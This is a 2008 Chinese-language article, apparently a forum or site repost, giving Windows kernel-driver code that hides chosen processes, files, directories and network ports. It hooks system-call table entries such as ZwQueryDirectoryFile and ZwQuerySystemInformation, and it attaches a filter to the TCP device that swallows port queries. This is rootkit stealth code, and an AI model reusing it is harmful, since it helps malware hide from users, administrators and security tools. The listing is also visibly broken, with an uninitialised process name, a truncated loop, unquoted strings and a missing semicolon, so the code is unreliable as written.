编程实现隐藏任意进程,目录/文件,注册表,端口

2008/12/21 来源:www.arpun.com 作者:小白

查找进程, 目录/文件, 注册表等操作系统将最终调用 ZwQueryDirectoryFile, ZwQuerySystemInFORMation, ZwXXXvalueKey 等函数。 要想拦截这些函数达到隐藏目的, 需先自己实现以上函数, 并修改系统维护的一个 SYSCALL 表使之指向自己预先定义的函数。 因 SYSCALL 表在用户层不可见, 所以要写 DRIVE 在 RING 0 下 才可修改。 关于如何修改已有文章详细介绍过, 这里不在详述。 (可以参见 sysinternals.com 或 WebCrazy 所 写的文章)。 查找端口用的是 TDI 查询。 TDI 导出了两个设备 \\Device\\Tcp 与 \\Device\\Udp。 我们可以利 用设备过滤驱动的方法写一个 DRIVE 把这两个设备的所有 IRP 包接管过来进行处理后再传给下层驱动。 以达到 隐藏任意端口的目的。 上述提到的方法不是新东西, 是在N年前就已经有的老技术。 俺现在将它贴出来只不过为了 充实下版面, 灌灌水罢了。 高手们还是别看了。 下面是我 DRIVE 中隐藏任意进程, 目录/文件, 端口代码片段。 (注册表操作在 RegMon 中写的很详细, 这里就不列出了) Code: -------------------------------------------------------------------------------- typedef struct _FILETIME { DWORD dwLowDateTime; DWORD dwHighDateTime; } FILETIME; typedef struct _DirEntry { DWORD dwLenToNext; DWORD dwAttr; FILETIME ftCreate, ftLastAccess, ftLastWrite; DWORD dwUnknown[ 2 ]; DWORD dwFileSizeLow; DWORD dwFileSizeHigh; DWORD dwUnknown2[ 3 ]; WORD wNameLen; WORD wUnknown; DWORD dwUnknown3; WORD wShortNameLen; WCHAR swShortName[ 12 ]; WCHAR suName[ 1 ]; } DirEntry, *PDirEntry; struct _SYSTEM_THREADS { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientIs; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; ULONG ThreadState; KWAIT_REASON WaitReason; }; struct _SYSTEM_PROCESSES { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; struct _SYSTEM_THREADS Threads[1]; }; // 隐藏目录/文件 NTSTATUS HookZwQueryDirectoryFile( IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, OUT PVOID FileInFORMationBuffer, IN ULONG FileInFORMationBufferLength, IN FILE_INFORMATION_CLASS FileInfoClass, IN BOOLEAN bReturnOnlyOneEntry, IN PUNICODE_STRING PathMask OPTIONAL, IN BOOLEAN bRestartQuery) { NTSTATUS rc; CHAR aProcessName[80]; ANSI_STRING ansiFileName,ansiDirName; UNICODE_STRING uniFileName; PP_DIR ptr; WCHAR ParentDirectory[1024] = {0}; int BytesReturned; PVOID Object; // 执行旧的ZwQueryDirectoryFile函数 rc = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile))( hFile, hEvent, IoApcRoutine, IoApcContext, pIoStatusBlock, FileInFORMationBuffer, FileInFORMationBufferLength, FileInfoClass, bReturnOnlyOneEntry, PathMask, bRestartQuery); if(NT_SUCCESS(rc)) { PDirEntry p; PDirEntry pLast; BOOL bLastOne; int found; p = (PDirEntry)FileInFORMationBuffer; // 将查找出来结果赋给结构 pLast = NULL; do { bLastOne = !( p->dwLenToNext ); RtlInitUnicodeString(&uniFileName,p->suName); RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE); RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE); RtlUpperString(&ansiFileName,&ansiDirName); found=0; // 在链表中查找是否包含当前目录 for(ptr = list_head; ptr != NULL; ptr = ptr->next) { if (ptr->flag != PTR_HIDEDIR) continue; if( RtlCompareMemory( ansiFileName.Buffer, ptr->name,strlen(ptr->name) ) == strlen(ptr->name)) { found=1; break; } }//end for // 如果链表中包含当前目录, 隐藏 if(found) { if(bLastOne) { if(p == (PDirEntry)FileInFORMationBuffer ) { rc = 0x80000006; //隐藏 } else pLast->dwLenToNext = 0; break; } else { int iPos = ((ULONG)p) - (ULONG)FileInFORMationBuffer; int iLeft = (DWORD)FileInFORMationBufferLength - iPos - p->dwLenToNext; RtlCopyMemory( (PVOID)p, (PVOID)( (char *)p + p->dwLenToNext ), (DWORD)iLeft ); continue; } } pLast = p; p = (PDirEntry)((char *)p + p->dwLenToNext ); }while( !bLastOne ); RtlFreeAnsiString(&ansiDirName); RtlFreeAnsiString(&ansiFileName); } return(rc); } // 隐藏进程 NTSTATUS HookZwQuerySystemInFORMation( IN ULONG SystemInFORMationClass, IN PVOID SystemInFORMation, IN ULONG SystemInFORMationLength, OUT PULONG ReturnLength) { NTSTATUS rc; ANSI_STRING process_name,process_uname,process_name1,process_name2; BOOL g_hide_proc = TRUE; CHAR aProcessName[80]; PP_DIR ptr; int found; // 执行旧的ZwQuerySystemInFORMation函数 rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInFORMation)) ( SystemInFORMationClass, SystemInFORMation, SystemInFORMationLength, ReturnLength ); if(NT_SUCCESS(rc )) { if( g_hide_proc && (5 == SystemInFORMationClass)) { // 将查找出来结果赋给结构 struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInFORMation; struct _SYSTEM_PROCESSES *prev = NULL; // 遍历进程 while(curr) { if((0 < process_name.Length) && (255 > process_name.Length)) { found=0; // 遍历链表 for (ptr=list_head;ptr!=NULL;ptr=ptr->next ) { if (ptr->flag != PTR_HIDEPROC) continue ; if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0) { found =1; } } // 判断如果是隐藏进程名则覆盖掉此进程名 while(found) { if(prev) { if(curr->NextEntryDelta) { prev->NextEntryDelta += curr->NextEntryDelta; } else { prev->NextEntryDelta = 0; } } else { if(curr->NextEntryDelta) { (char *)SystemInFORMation += curr->NextEntryDelta; } else { SystemInFORMation = NULL; } } if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta); else { curr = NULL;break; } // 遍历链表 found = 0; for (ptr=list_head;ptr!=NULL;ptr=ptr->next ) { if (ptr->flag != PTR_HIDEPROC) continue ; if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0) { found = 1; } } } } if(curr != NULL) { prev = curr; if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta); else curr = NULL; } } } } return(rc); } //隐藏端口 PDEVICE_OBJECT m_TcpgetDevice; PDEVICE_OBJECT TcpDevice; UNICODE_STRING TcpDeviceName; PDRIVER_OBJECT TcpDriver; PDEVICE_OBJECT TcpgetDevice; PDEVICE_OBJECT FilterDevice PDRIVER_DISPATCH Empty; NTSTATUS status; Empty = DriverObject->MajorFunction[IRP_MJ_Create]; RtlInitUnicodeString( &TcpDeviceName, L\\Device\\Tcp); //得到已有的设备指针 status = IoGetDeviceObjectPointer( &TcpDeviceName, FILE_ALL_ACCESS, &FileObject, &TcpDevice ); if(!NT_SUCCESS(status)) { DbgPrint(IoGetDeviceObjectPointer error!\n); return status; } DbgPrint(IoGetDeviceObjectPointer ok!\n); // 建立设备 status = IoCreateDevice( DriverObject, sizeof(DEVICE_EXTENSION), NULL, FILE_DEVICE_UNKNOWN, 0, FALSE, &FilterDevice ); if(!NT_SUCCESS(status)) { return status; } // 加入设备 TcpgetDevice = IoAttachDeviceToDeviceStack( FilterDevice, TcpDevice); if(!TcpgetDevice) { IoDeleteDevice(FilterDevice); DbgPrint(IoAttachDeviceToDeviceStack error!\n); return STATUS_SUCCESS; } m_TcpgetDevice = TcpgetDevice; // 加到过滤函数中处理 for(i=0;i { if((TcpDriver->MajorFunction!=Empty)&&(DriverObject->MajorFunction==Empty)) { DriverObject->MajorFunction = PassThrough; } } ObDereferenceObject(FileObject); NTSTATUS PassThrough( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp ) { NTSTATUS status; PIO_STACK_LOCATION pIrpStack; pIrpStack = IoGetCurrentIrpStackLocation( Irp ); //如是查询则完成 IRP if ( pIrpStack->Parameters.DeviceIoControl.IoControlCode == QUERY_INFORMATION_EX) { //这里可以近一步判断某个端口 Irp->IoStatus.Status=STATUS_SUCCESS; IoCompleteRequest(Irp,IO_NO_INCREMENT); return STATUS_SUCCESS; } //复制当前 IRP IoCopyCurrentIrpStackLocationToNext(Irp); IoSetCompletionRoutine( Irp, GenericCompletion, NULL, TRUE, TRUE, TRUE ); //传递 return IoCallDriver( m_TcpgetDevice, Irp); } 

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